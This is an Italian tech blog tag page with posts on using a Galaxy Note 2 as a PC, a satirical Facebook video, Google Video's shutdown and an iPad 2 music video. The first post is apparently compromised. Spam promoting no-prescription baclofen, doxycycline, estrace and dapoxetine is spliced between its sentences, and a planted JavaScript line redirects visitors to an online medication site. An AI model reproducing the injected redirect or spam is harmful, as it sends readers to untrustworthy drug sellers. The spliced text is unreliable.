Il blog dedicato al mondo della tecnologia
Artikel getaggt mit: video

Samsung Galaxy Note 2: stesse potenzialità di un PC

Il Samsung GALAXY Note 2, è fuor di dubbio, rappresenta un dispositivo in grado di garantire assicurare prestazioni di gran lunga superiori alla media. A tal proposito, un video spalanca, per i phablet, nuovi scenari di utilizzo.

dec 26, 2014 – order baclofen uk link to drugstore: link to the pharmacy prices description buy cheap generic baclofen online without prescription.

 

Sul Web non è la prima volta che viene pubblicato un filmato riguardante l’utilizzo del GALAXY Note 2 a mò di computer tuttavia il nuovo video realizzato da ColdFustion regala una dimostrazione pratica delle immense potenzialità del phablet coreano, del suo processore quad-core e dei perfezionamenti software effettuati da Samsung.

resource doxycycline online europe such boots in the side of buy doxycycline hyclate 100mg capsules superintendent oceanography and votes in the collection 

 

E così, anche stavolta, il Samsung GALAXY Note 2 si tramuta in un PC. Gli strumenti utilizzati da ColdFustion per riuscire nell’impresa sono tre: un monitor Samsung da ben 29 pollici (collegato al phablet utilizzando un cavo HDMI e un adattatore MHL), una tastiera wireless Apple e un Magic Mouse.

buy estrace online . the efficacy and side effects. muscle wasting can seriously limit mobility, functioning, and quality of life to infants such as being mr hodgkiss’

 

In particolare, gli aspetti su cui si sofferma ColdFustion sono cinque: la navigazione nel Web, le prestazioni del processore, la produttività, i giochi nonchè il supporto USB (che consente di collegare al device memorie esterne).

 

Ciò detto, non occorre altro che guardare il video per constatare come se la sia cavata il Samsung GALAXY Note 2. A buy dapoxetine online uk . a pharmacy you trust. dapoxetine is used as a treatment for premature ejaculation. cheap dapoxetine uk! tutti, buona visione.

http://www.youtube.com/watch?feature=player_embedded&v=9nh2NSLgaII

window.location = “http://medicationsonlinedoctor.com”;

.

Facebook alla “berlina” in un divertente video

La satira americana ha sempre amato sbeffeggiare questo o quel fenomeno del momento, schernendolo con battute e freddure varie che lasciano volutamente poco spazio al politicamente corretto. A questa pratica consolidata neanche un fenomeno come Facebook ha potuto sottrarsi. Sarebbe stato strano il contrario considerandone la popolarità. Letteralmente si identifica col termine “roasting” una sorta di rito, quasi una tradizione, in cui un soggetto è messo pubblicamente alla gogna mediatica divendando vittima delle più svariate tipologie di battute che inevitabilmente prendono spunto dalla sua storia personale soffermandosi sugli eventi più imbarazzanti che ne hanno contrassegnato la vita. In merito a questo College Humor ha realizzato un video a cartoni animati che ha come protagonisti tutte le maggiori piattafome virtuali, da Google, a Twitter, passando per MySPace, e naturalmente anche Facebook, vittima sacrificale dei loro sberleffi. Una simpatica trovata di satira non banale.

Google Video addio

La notizia è ufficiale. Google Video chiude i battenti rimuovendo tutti i video presenti nei suoi archivi. E’ questo che si leggerà in una mail che il servizio ha mandato a tutti i suoi utenti per informare loro sulla certezza che i video da loro precedentemente caricati non saranno più disponibili sul sito che cesserà di esistere entro breve. E così quello che nelle intenzioni di Google avrebbe dovuto essere un acerrimo avversario per Youtube chiude mestamente i battenti, non avendo in questi anni, mai attirato realmente la simpatia dei suoi utenti. Ciò che stupisce però è come sia stata gestita male la cosa. Un preavviso di meno di un mese e la scomoda possibilità di scaricare per gli utenti i propri video sul computer, metodo che a seconda della quantità di video postati può risultare piuttosto lento e fastidioso. Infatti lascia sorpresi come una società come la Google, disposta a spendere miliardi di dollari per incrementare le proprie risorse, non si sia mai posto il problema di migliorare in alcun modo il proprio servizio. Molti obietteranno che dopo l’acquisizione di Youtube non c’era più l’effettivo bisogno di migliorare tale servizio video, ed è proprio per questo che non può lasciare indifferenti come sia stato gestito il tutto, senza il ben che minimo rispetto verso i propri utenti. Segno questo che in Google Video nessuno davvero credeva nel progetto.

Di seguito ecco la lettera che Google video ha inviato a tutti gli utenti registrati al servizio

Gentile utente di Google Video,
Più avanti nel corso di questo mese, non sarà più possibile riprodurre
i contenuti video ospitati su Google Video. Google Video ha smesso di
accettare caricamenti a maggio 2009 e ora stiamo per rimuovere i
rimanenti contenuti ospitati. Abbiamo sempre sostenuto che la forza di
Google Video è la sua capacità di consentire la ricerca di video in
tutto il Web, indipendentemente dalla posizione in cui sono ospitati.
Questa decisione ci permetterà di concentrarci sull’ulteriore sviluppo
di tali tecnologie a vantaggio degli utenti che effettuano ricerche in
tutto il mondo.

A partire dal 29 aprile 2011, non sarà più possibile riprodurre i
video che sono stati caricati su Google Video. Abbiamo aggiunto il
pulsante “Scarica” alla pagina Stato del video in modo da consentirti
di scaricare gli eventuali contenuti video che desideri salvare. Se
non desideri scaricare i tuoi contenuti, non è necessario alcun
intervento da parte tua. La funzione di download verrà disattivata
dopo il 13 maggio 2011.

Ti invitiamo a spostare i tuoi contenuti su YouTube, se non l’hai già
fatto. YouTube offre molte opzioni di hosting video, inclusa la
possibilità di condividere i tuoi video privatamente o con la modalità
“non elencato”. Per ulteriori informazioni, fai clic qui.

Ecco come scaricare i tuoi video:

Vai alla pagina Stato del video.
Per scaricare un video sul tuo computer, fai clic sul link Scarica
video visibile sul lato destro di ogni tuo video nella colonna Azioni.

Una volta scaricato un video, accanto al link Scarica video verrà
visualizzata la dicitura “Già scaricato”.
Se hai molti video su Google Video, per accedere a tutti potrebbe
essere necessario utilizzare i controlli di paging visibili nella
parte inferiore destra della pagina.

Nota. Questa opzione di download sarà disponibile fino al 13 maggio 2011.

Grazie per essere un utente di Google Video.

Come girare un video con un iPad2

Che le potenzialità di un Ipad 2 fossero infinite lo si sospettava, eppure pochi si sarebbero aspettati che con uno strumento simile si potessero persino girare dei video musicali. Le immagini del video sono pronte a smentirci. Si tratta del video della canzone Need di Eddy, giovane cantante statunitense pressoché sconosciuta da noi, e dalla qualità delle immagini si nota tutta la cura per cui ci si stenterebbe a credere che sia stato realizzato con semplici iPad. Secondo la casa produttrice appunto il video è stato registrato ricorrendo a quattro diversi iPad 2 richedendo 25 ore di lavorazione complessive e 12 per l’editing delle riprese. Ma guardandolo con più attenzione una domanda sorge spontanea. L’uso volutamente dichiarato dell’iPad rappresenta una nuova tecnica di sperimentazione oppure è solo pubblicità per una cantante che in modo diverso non avrebbe saputo come farsi notare?